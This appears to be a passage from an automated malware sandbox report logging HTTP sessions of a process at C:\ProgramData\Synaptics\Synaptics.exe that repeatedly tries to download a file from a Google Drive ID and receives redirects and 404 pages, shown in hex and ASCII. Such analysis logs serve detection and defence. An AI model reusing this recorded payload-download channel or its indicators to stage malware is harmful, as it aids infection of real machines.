                                                                                                                                                                                    2024-12-30 10:51:03 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 4d 57 79 2d 7a 4d 38 6e 79 33 35 66 6c 78 55 77 6f 65 2d 6f 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QMWy-zM8ny35flxUwoe-og">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                                                    2024-12-30 10:51:03 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    11192.168.2.449755142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:04 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:04 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:04 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-f-BuCd1FXBfahrZ6FqQa0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    12192.168.2.449756142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:04 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:04 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:04 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-VyDt3rJMxXuD7L1IUD4y3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    13192.168.2.449757142.250.186.334435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:04 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=dbP6m55jOXmeVvqf-7qrAR5nN00yk5-K2vW_Lpg8QyEEmyYAEb7WZbn2-VL6F7gw223sN9c-SdEQElGxRoejvcg5joy6HyynSuxtgMaGou9ZayiFWm5NmnXs-YzZKaWL928ckLLAGkuaTJNA-zjQjYOyBK5qxNRt_7QjX5pDLyjaoYfpZWA-5Aae
                                                                                                                                                                                    2024-12-30 10:51:04 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC5g9OX2jaA4ulmOZG9qTReqoSMV62jdA7AV2jw4BAiKyQuXAESo9JUe4Ve8-Mc7w0Eh
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:04 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-4YIXQAyAMZAjmF7G3Ailsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:04 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:51:04 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 50 54 45 6b 66 6b 78 49 77 30 68 59 34 65 5a 38 57 31 35 6e 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="ZPTEkfkxIw0hY4eZ8W15ng">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:51:04 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    14192.168.2.449758142.250.186.334435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:04 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=dbP6m55jOXmeVvqf-7qrAR5nN00yk5-K2vW_Lpg8QyEEmyYAEb7WZbn2-VL6F7gw223sN9c-SdEQElGxRoejvcg5joy6HyynSuxtgMaGou9ZayiFWm5NmnXs-YzZKaWL928ckLLAGkuaTJNA-zjQjYOyBK5qxNRt_7QjX5pDLyjaoYfpZWA-5Aae
                                                                                                                                                                                    2024-12-30 10:51:05 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC5y8MZPPKPEQRZfz4m49TkBYOa0L6yMkzLCDzp2wuLQ5kER3qTqzXDsTMHFrf9FdIQhsD7mB-c
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:04 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce--aj76B1TIcHe6P-bf90SXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:05 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:51:05 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 71 74 57 38 66 37 51 2d 43 72 73 33 6a 76 4f 55 68 46 6f 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="4qtW8f7Q-Crs3jvOUhFoIg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:51:05 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    15192.168.2.449762142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:05 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    16192.168.2.449763142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:05 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    17192.168.2.449764142.250.186.334435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:05 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    18192.168.2.449765142.250.186.334435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:05 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:06 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC4jYI_DqecVR8zrhTBB8Ekh4HjEBow8fRm6FOrPwOhSsW4YeC_iq3Oiz0TUvfTGMiTDe4KyuNU
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:06 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-wHrGWf-Ul6FiAUncUIGEWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:06 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:51:06 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 79 33 4c 62 4a 57 74 69 4c 56 2d 78 75 4f 58 45 33 4f 79 4e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="9y3LbJWtiLV-xuOXE3OyNw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:51:06 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    19192.168.2.449768142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:06 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:06 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:06 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-vKY04NnyIheb9MsibNAj9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
